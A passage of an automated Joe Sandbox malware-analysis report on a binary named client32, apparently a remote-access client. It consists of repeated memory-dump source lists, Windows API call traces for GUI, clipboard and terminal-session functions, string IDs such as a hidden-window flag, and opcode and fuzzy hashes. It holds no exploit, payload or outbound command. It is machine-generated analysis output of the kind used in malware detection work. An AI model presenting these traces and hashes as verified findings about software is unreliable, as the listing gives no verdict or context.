                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                                                • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                • API String ID: 856016564-3838485836
                                                                                                                • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                                • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                                                • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                                • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                                • String ID:
                                                                                                                • API String ID: 4100900918-3916222277
                                                                                                                • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                                • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                                                • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                                • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1101F0FE
                                                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                                • _memset.LIBCMT ref: 1101F1CF
                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                                                • String ID: 0$MakeOwnerDraw
                                                                                                                • API String ID: 1249465458-1190305232
                                                                                                                • Opcode ID: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                                                • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                                                • Opcode Fuzzy Hash: 8c9bd2224f42fac49adbc09d6f8f2acc0ae91da077bc4100c348b21e51c723fb
                                                                                                                • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                                                • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastShowWindow
                                                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                • API String ID: 3252650109-4091810678
                                                                                                                • Opcode ID: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                                                • Opcode Fuzzy Hash: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
                                                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,0BAD89F8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                • API String ID: 2188719708-2019804778
                                                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf
                                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                • API String ID: 2111968516-2092292787
                                                                                                                • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                                APIs
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                                                • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                                                • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                                                • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                                                • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                                                • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                                                • SelectObject.GDI32(?,?), ref: 11003128
                                                                                                                • DeleteObject.GDI32(?), ref: 1100312E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 4121194973-0
                                                                                                                • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                                • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                                • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                                APIs
                                                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                                • API String ID: 3210887762-597690070
                                                                                                                • Opcode ID: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                                                • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                                                • Opcode Fuzzy Hash: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                                                • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 110513F9
                                                                                                                • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle__wcstoi64_memset
                                                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                                                • API String ID: 510078033-311296318
                                                                                                                • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                                                • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                                                • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                                                • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                                                • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
